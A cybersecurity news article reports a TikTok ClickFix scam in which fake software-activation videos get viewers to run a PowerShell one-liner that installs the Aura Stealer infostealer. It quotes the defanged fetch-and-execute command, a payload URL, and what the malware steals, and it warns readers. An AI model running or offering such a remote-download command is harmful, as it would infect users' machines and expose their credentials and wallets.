Dataconomy
  • News
    • Artificial Intelligence
    • Cybersecurity
    • DeFi & Blockchain
    • Finance
    • Gaming
    • Startups
    • Tech
  • Industry
  • Research
  • Resources
    • Articles
    • Guides
    • Case Studies
    • Glossary
    • Whitepapers
  • Newsletter
  • + More
    • Conversations
    • Events
    • About
      • About
      • Contact
      • Imprint
      • Legal & Privacy
      • Partner With Us
Subscribe
No Result
View All Result
  • AI
  • Tech
  • Cybersecurity
  • Finance
  • DeFi & Blockchain
  • Startups
  • Gaming
Dataconomy
  • News
    • Artificial Intelligence
    • Cybersecurity
    • DeFi & Blockchain
    • Finance
    • Gaming
    • Startups
    • Tech
  • Industry
  • Research
  • Resources
    • Articles
    • Guides
    • Case Studies
    • Glossary
    • Whitepapers
  • Newsletter
  • + More
    • Conversations
    • Events
    • About
      • About
      • Contact
      • Imprint
      • Legal & Privacy
      • Partner With Us
Subscribe
No Result
View All Result
Dataconomy
No Result
View All Result

TikTok’s latest scam teaches users how to infect their own PCs

The scam uses a ClickFix technique that convinces viewers to paste and run malicious PowerShell commands with admin privileges.

byEmre Çıtak
October 20, 2025
in Cybersecurity, News

Cybercriminals are distributing information-stealing malware on TikTok using videos disguised as free software activation guides. According to BleepingComputer, ISC Handler Xavier Mertens identified the ongoing campaign, which employs a social engineering method known as a ClickFix attack to infect computer systems.

The videos, observed by BleepingComputer, claim to provide instructions for activating legitimate software such as Windows, Microsoft 365, Adobe Premiere, Photoshop, CapCut Pro, and Discord Nitro. The campaign also promotes fictitious services, including “Netflix Premium” and “Spotify Premium.” Mertens noted this activity is largely the same as a campaign previously observed by the security firm Trend Micro in May. The videos use a social engineering technique that presents a seemingly valid fix or set of instructions to deceive users into compromising their own machines.

This ClickFix attack tricks users into executing malicious PowerShell commands. Each video displays a one-line command, such as `iex (irm slmgr[.]win/photoshop)`, and instructs viewers to run it with administrator privileges. The program name in the URL is modified to match the software being impersonated; a fake Windows guide would use a URL containing “windows” instead of “photoshop.”

Stay Ahead of the Curve!

Don't miss out on the latest insights, trends, and analysis in the world of data, technology, and startups. Subscribe to our newsletter and get exclusive content delivered straight to your inbox.

When the command is executed, PowerShell connects to the remote site `slmgr[.]win` to retrieve and run another PowerShell script. This script downloads two executables from Cloudflare pages. The first, from `https://file-epq[.]pages[.]dev/updater.exe`, is a variant of Aura Stealer malware. This infostealer is designed to harvest saved browser credentials, authentication cookies, cryptocurrency wallet data, and other application credentials. The stolen data is then uploaded to the attackers, granting them access to the victim’s accounts.

A second payload, `source.exe`, is also downloaded as part of the attack. According to Mertens, this executable self-compiles code using .NET’s built-in Visual C# Compiler (`csc.exe`). The resulting code is subsequently injected and launched directly in memory. The specific purpose of this additional payload remains unclear.

Users who have performed these steps should consider all of their credentials compromised. The recommended course of action is to immediately reset passwords on all sites and services they use to prevent unauthorized account access and further data theft.

ClickFix attacks have become popular over the past year and are used to distribute various malware strains in ransomware and cryptocurrency theft campaigns. As a general rule, users should never copy text from a website and run it in an operating system dialog box. This advisory includes the File Explorer address bar, command prompt, PowerShell prompts, the macOS terminal, and Linux shells.


Featured image credit

Tags: scamtiktok

Related Posts

AWS outage: A complete list of every site and app that went down

AWS outage: A complete list of every site and app that went down

October 20, 2025
Facebook’s new AI tool will scan your camera roll

Facebook’s new AI tool will scan your camera roll

October 20, 2025
Google will discontinue this once fancy project and here’s why

Google will discontinue this once fancy project and here’s why

October 20, 2025
Wikipedia’s human traffic drops 8% as AI takes the wheel

Wikipedia’s human traffic drops 8% as AI takes the wheel

October 20, 2025
WhatsApp tests monthly message cap to fight spam

WhatsApp tests monthly message cap to fight spam

October 20, 2025
How one woman beat eviction court using ChatGPT and Perplexity

How one woman beat eviction court using ChatGPT and Perplexity

October 20, 2025

LATEST NEWS

Facebook’s new AI tool will scan your camera roll

Google will discontinue this once fancy project and here’s why

Wikipedia’s human traffic drops 8% as AI takes the wheel

WhatsApp tests monthly message cap to fight spam

How one woman beat eviction court using ChatGPT and Perplexity

NVIDIA’s first US-made Blackwell wafer rolls out of TSMC’s Arizona fab

Dataconomy

COPYRIGHT © DATACONOMY MEDIA GMBH, ALL RIGHTS RESERVED.

  • About
  • Imprint
  • Contact
  • Legal & Privacy

Follow Us

  • News
    • Artificial Intelligence
    • Cybersecurity
    • DeFi & Blockchain
    • Finance
    • Gaming
    • Startups
    • Tech
  • Industry
  • Research
  • Resources
    • Articles
    • Guides
    • Case Studies
    • Glossary
    • Whitepapers
  • Newsletter
  • + More
    • Conversations
    • Events
    • About
      • About
      • Contact
      • Imprint
      • Legal & Privacy
      • Partner With Us
No Result
View All Result
Subscribe

This website uses cookies. By continuing to use this website you are giving consent to cookies being used. Visit our Privacy Policy.